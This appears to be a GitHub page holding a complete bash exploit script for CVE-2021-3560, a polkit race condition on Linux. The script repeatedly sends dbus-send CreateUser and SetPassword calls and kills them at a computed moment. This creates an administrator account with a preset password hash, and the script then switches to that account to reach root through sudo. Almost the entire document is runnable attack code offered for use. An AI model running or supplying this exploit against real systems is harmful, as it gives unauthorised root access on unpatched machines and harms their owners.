-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathpolkadots
executable file
·141 lines (117 loc) · 3.42 KB
/
polkadots
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
#!/bin/bash
# Exploit Title: CVE-2021-3560 local PrivEsc Exploit
# Date: [11th June 2021]
# DISCOVERED BY: Kevin Backhouse
# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
# Exploit Author: Swapravo Sinha Roy
# Software Link: https://github.com/swapravo/polkadots
# Tested on: Fedora 21
# CVE-2021-3560
# Affected Distributions: RHEL 8, Fedora 21, Debian testing (Bullseye), Ubuntu 20.04
# License: MIT
# run this inside an ssh terminal to avoid GUI prompts
setval() {
printf -v "$1" "%s" "$(cat)"; declare -p "$1";
}
timeit(){
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$account string:"$account_name" int32:1
}
# execute command and redirect output, errors to variables
catch(){
eval "$({
__2="$(
{ __1="$("${@:3}")"; } 2>&1;
ret=$?;
printf '%q=%q\n' "$1" "$__1" >&2;
exit $ret
)";
ret="$?";
printf '%s=%q\n' "$2" "$__2" >&2;
printf '( exit %q )' "$ret" >&2;
} 2>&1 )";
}
run(){
echo account: $account
echo account name: $account_name
echo hashed_password: $hashed_password
echo iters: $iters
# change this to apt-get, if on debian
exists1=$(yum list installed | grep accountsservice)
exists2=$(yum list installed | grep gnome-control-center)
if [ "$exists1" = "" ] || [ "$exists2" = "" ]; then
echo "Required services not installed!"
echo "Likely to Fail!"
fi
# find average time to kill dbus-send in
for i in $(seq 1 $iters)
do
catch stdout stderr timeit
set -- $stderr
t=$(echo $7 | cut -d 'm' -f 2 | cut -d 's' -f 1)
tt=$(echo "$t + $tt" | bc -l)
done
kill_time=$(echo "scale=3; $tt / 2 / $iters" | bc -l)
echo Kill Time: $kill_time
# try creating the user
re='^[0-9]+$'
while :
do
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$account string:"$account_name" int32:1 & sleep $kill_time; kill $!
find_account=$(id -u $account)
if [[ $find_account =~ $re ]] ; then
break;
fi
done
echo $account found! uid: $find_account
# set his password
for i in $(seq 1 $iters)
do
# you can't check whether this worked without sudo
# if it fails, run the script again
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$find_account org.freedesktop.Accounts.User.SetPassword string:"$hashed_password" string:GoldenEye & sleep $kill_time ; kill $!
done
su - $account
# enter password
# in $account@victim, execute:
# sudo su
# enter password again
}
help(){
echo $'\n'
echo "Usage:"
echo "$0 -a [Account] -n [Account name] -h [Password hash] -i [iterations]"
echo $'\t\t' 'Generate hashed passwords with: openssl passwd -6 password@123'
echo "Defaults: "
echo $'\t'"-a $account"
echo $'\t'"-n $account_name"
echo $'\t'"-h $hashed_password"
echo $'\t'"-i $iters"
exit 0
}
tt=0.0
iters=20
account=boris
account_name='Boris Ivanovich Grishenko'
# $(openssl passwd -6 iaminvincible!)
hashed_password='$6$cGKhfu9znRnOQV1h$2j/3WKyqTcCaftP1PGhW8Pghj2qV5j8zwy1gHrt9eILUE6WKeWVCTa9QgkskIfwVXpjVI.TuX2D.rEkbwKubi/'
while getopts ":a:h:n:i:" o; do
case "${o}" in
a)
account=${OPTARG}
;;
h)
hashed_password=${OPTARG}
;;
n)
account_name=${OPTARG}
;;
i)
iters=${OPTARG}
;;
*)
help
;;
esac
done
shift $((OPTIND-1))
run